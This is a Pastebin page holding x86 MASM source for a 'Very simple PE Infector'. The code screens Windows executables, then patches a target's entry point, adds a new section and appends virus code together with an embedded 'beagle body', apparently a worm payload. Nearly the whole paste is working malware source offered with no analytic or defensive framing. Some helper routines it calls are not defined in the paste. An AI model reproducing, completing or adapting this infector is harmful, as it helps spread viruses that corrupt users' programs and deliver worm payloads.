API tools faq
paste
Advertisement
Guest User

Untitled

a guest
May 23rd, 2017
62
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 10.03 KB | None | 0 0
raw download clone embed print report
  1. ; Very simple PE Infector
  2. ; #########################################################################
  3.  
  4. .data
  5. ; .exe file to join
  6. lpWorkFileData dd 0
  7. dwWorkFileDataLen dd 0
  8.  
  9. szGoodSections db ".text",0
  10. db ".rsrc",0
  11. db ".data",0
  12. db ".rdata",0
  13. db ".edata",0
  14. db ".sdata",0
  15. db ".idata",0
  16. db ".tls",0
  17. db ".bss",0
  18. db ".reloc",0
  19. db ".CRT",0
  20. db "BEGTEXT",0
  21. db "DGROUP",0
  22. db "CODE",0
  23. db "DATA",0
  24. db "BSS",0,0
  25.  
  26. .code
  27.  
  28. IsValidPE proc lpFile: DWORD
  29. xor eax, eax
  30.  
  31. mov edx, lpFile
  32.  
  33. ; Check MZ signature
  34. cmp word ptr[edx], 'ZM'
  35. jnz @not_valid_pe
  36.  
  37. ; Check some offset
  38. cmp word ptr[edx+18h], 40h
  39. jl @not_valid_pe
  40.  
  41. ; Check PE signature
  42. PEPtrA edx
  43. cmp word ptr[edx], 'EP'
  44. jnz @not_valid_pe
  45.  
  46. ; GUI only
  47. cmp word ptr[edx+5ch], 0002h
  48. jnz @not_valid_pe
  49.  
  50. ; Doesn't support DLL files
  51. test word ptr[edx+16h], 2000h
  52. jnz @not_valid_pe
  53.  
  54. ; Should not have export table, damn unwise apps
  55. cmp dword ptr[edx+78h], 0
  56. jnz @not_valid_pe
  57.  
  58. ; Should present import table, win2k loader sux
  59. cmp dword ptr[edx+80h], 0
  60. jz @not_valid_pe
  61.  
  62. inc eax
  63.  
  64. @not_valid_pe:
  65. ret
  66. IsValidPE endp
  67.  
  68. ; Check if new section can be added
  69. CheckHeaderSize proc lpFile: DWORD
  70. invoke SectionCount, lpFile
  71. inc eax
  72. xor edx, edx
  73. mov ecx, 28h
  74. mul ecx
  75.  
  76. mov edx, lpFile
  77. mov edx, dword ptr[edx+3ch]
  78. add edx, 0f8h
  79. add eax, edx ; header size + sizeof new section
  80.  
  81. PEPtrA edx
  82. mov edx, dword ptr[edx+54h] ; header size specified in PE header
  83. .IF edx < eax
  84. xor eax, eax
  85. .ELSE
  86. mov eax, 1
  87. .ENDIF
  88. ret
  89. CheckHeaderSize endp
  90.  
  91. ; Check if file is aligned
  92. CheckFileAlign proc lpFile, dwFileSize: DWORD
  93. PEPtrA eax
  94. mov eax, dword ptr[eax+3ch]
  95. xor edx, edx
  96. xchg eax, dwFileSize
  97. div dwFileSize
  98. xor eax, eax
  99. test edx, edx
  100. setz al
  101. ret
  102. CheckFileAlign endp
  103.  
  104. ; Check if file contains only good sections (not packed/protected/etc)
  105. CheckSectionName proc uses edi szSectionName: DWORD
  106. mov edi, offset szGoodSections
  107.  
  108. @next:
  109. invoke lstrcmp, szSectionName, edi
  110. .IF !eax
  111. inc eax
  112. ret
  113. .ENDIF
  114. cld
  115. xor eax, eax
  116. or ecx, -1
  117. repnz scasb
  118. cmp byte ptr[edi], 0
  119. jnz @next
  120.  
  121. xor eax, eax
  122. ret
  123. CheckSectionName endp
  124.  
  125. CheckSections proc uses esi edi ebx lpFile, dwFileSize: DWORD
  126. LOCAL s_name[9]: BYTE
  127.  
  128. invoke ZeroMemory, addr s_name, 9
  129.  
  130. invoke SectionCount, lpFile
  131. .IF !eax
  132. jmp @cs_ret
  133. .ENDIF
  134. mov ebx, eax
  135. dec ebx
  136.  
  137. ; Check if there's no extra data at the end of the file
  138. invoke SectionHeadPtr, ebx, lpFile
  139. mov edx, [eax][SectionHead.PhysOffs]
  140. add edx, [eax][SectionHead.PhysSize]
  141. .IF edx != dwFileSize
  142. xor eax, eax
  143. jmp @cs_ret
  144. .ENDIF
  145.  
  146. @l:
  147. invoke SectionHeadPtr, ebx, lpFile
  148. mov esi, eax
  149. lea edi, s_name
  150. mov ecx, 8
  151. rep movsb
  152.  
  153. invoke CheckSectionName, addr s_name
  154. .IF !eax
  155. jmp @cs_ret
  156. .ENDIF
  157. dec ebx
  158. jns @l
  159.  
  160. @cs_ret:
  161. ret
  162. CheckSections endp
  163.  
  164. ; Pre-load file to append in the feature
  165. LoadWorkFile proc uses ebx esi edi lpszFileName: DWORD
  166. LOCAL hFile, dwFileSize: DWORD
  167.  
  168. invoke CreateFile, lpszFileName, GENERIC_READ, FILE_SHARE_READ or FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, 0
  169. mov hFile, eax
  170. inc eax
  171. jz @file_open_error
  172.  
  173. invoke GetFileSize, hFile, 0
  174. mov dwFileSize, eax
  175. inc eax
  176. jz @file_open_close
  177.  
  178. invoke CreateFileMapping, hFile, NULL, PAGE_READONLY, 0, 0, NULL
  179. .IF eax
  180. mov ebx, eax
  181. invoke MapViewOfFile, eax, FILE_MAP_READ, 0, 0, 0
  182. .IF eax
  183. push eax
  184.  
  185. invoke GlobalAlloc, GMEM_FIXED, dwFileSize
  186. mov lpWorkFileData, eax
  187.  
  188. mov esi, [esp]
  189. mov edi, eax
  190. mov ecx, dwFileSize
  191. mov dwWorkFileDataLen, ecx
  192. rep movsb
  193.  
  194. @not_valid_pe:
  195. call UnmapViewOfFile
  196. .ENDIF
  197. invoke CloseHandle, ebx
  198. .ENDIF
  199.  
  200. @file_open_close:
  201. invoke CloseHandle, hFile
  202.  
  203. @file_open_error:
  204. ret
  205. LoadWorkFile endp
  206.  
  207. InfectPE proc uses ebx esi edi lpszFileName: DWORD
  208. LOCAL hFile, dwFileSize, lpWorkMem, lpVirMem, dwVirSize, lpData: DWORD
  209. LOCAL isOK: DWORD
  210.  
  211. mov lpVirMem, 0
  212. mov lpWorkMem, 0
  213. mov isOK, 0
  214.  
  215. cmp lpWorkFileData, 0
  216. jz @file_open_error
  217.  
  218. invoke CreateFile, lpszFileName, GENERIC_READ or GENERIC_WRITE, FILE_SHARE_READ or FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, 0
  219. mov hFile, eax
  220. inc eax
  221. jz @file_open_error
  222.  
  223. invoke GetFileSize, hFile, 0
  224. mov dwFileSize, eax
  225. inc eax
  226. jz @file_open_close
  227.  
  228. invoke CreateFileMapping, hFile, NULL, PAGE_READWRITE, 0, 0, NULL
  229. .IF eax
  230. mov ebx, eax
  231. invoke MapViewOfFile, eax, FILE_MAP_ALL_ACCESS, 0, 0, 0
  232. .IF eax
  233. mov lpData, eax
  234. mov esi, eax
  235.  
  236. InstSehFrame <offset @not_valid_pe>
  237.  
  238. cmp dwFileSize, 512
  239. jle @not_valid_pe
  240.  
  241. invoke IsValidPE, esi
  242. test eax, eax
  243. jz @not_valid_pe
  244.  
  245. invoke CheckHeaderSize, esi
  246. test eax, eax
  247. jz @not_valid_pe
  248.  
  249. invoke CheckFileAlign, esi, dwFileSize
  250. test eax, eax
  251. jz @not_valid_pe
  252.  
  253. invoke CheckSections, esi, dwFileSize
  254. test eax, eax
  255. jz @not_valid_pe
  256.  
  257. invoke Sleep, 20
  258.  
  259. mov eax, 1024+@vir_code_end-@vir_code_begin
  260. add eax, dwWorkFileDataLen
  261. invoke GlobalAlloc, GMEM_FIXED, eax
  262. mov lpWorkMem, eax
  263.  
  264. PEPtrB edx, esi
  265.  
  266. ; Write virus code into WorkMem
  267. mov esi, offset @vir_code_begin
  268. mov edi, lpWorkMem
  269. mov ecx, @vir_code_end-@vir_code_begin
  270. rep movsb
  271.  
  272. ; Fix OEP in WorkMem buffer
  273. m2m dword ptr[edi-8], dword ptr[edx+28h]
  274. mov eax, dword ptr[edx+34h]
  275. add dword ptr[edi-8], eax
  276. not dword ptr[edi-8]
  277.  
  278. ; Write beagle body into WorkMem
  279. mov eax, dwWorkFileDataLen
  280. stosd
  281. mov esi, lpWorkFileData
  282. mov ecx, eax
  283. rep movsb
  284.  
  285. ; Create virus section WorkMem->VirMem
  286. mov eax, edi
  287. sub eax, lpWorkMem
  288. invoke GenVirCode, lpWorkMem, eax
  289. mov lpVirMem, eax
  290. mov dwVirSize, ecx
  291.  
  292. ; Add section header
  293. invoke AddEPSection, lpData, ecx, TRUE
  294.  
  295. mov isOK, 1
  296.  
  297. @not_valid_pe:
  298. KillSehFrame
  299. invoke UnmapViewOfFile, lpData
  300. .IF lpWorkMem
  301. invoke GlobalFree, lpWorkMem
  302. .ENDIF
  303. .IF (!isOK) && (lpVirMem)
  304. invoke GlobalFree, lpVirMem
  305. mov lpVirMem, 0
  306. .ENDIF
  307. .ENDIF
  308. invoke CloseHandle, ebx
  309. .IF lpVirMem
  310. ; Write virus section contents
  311. invoke SetFilePointer, hFile, 0, NULL, FILE_END
  312. invoke WriteFile, hFile, lpVirMem, dwVirSize, addr lpWorkMem, NULL
  313. invoke GlobalFree, lpVirMem
  314. .ENDIF
  315. .ENDIF
  316.  
  317. @file_open_close:
  318. invoke CloseHandle, hFile
  319.  
  320. @file_open_error:
  321. ret
  322. InfectPE endp
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!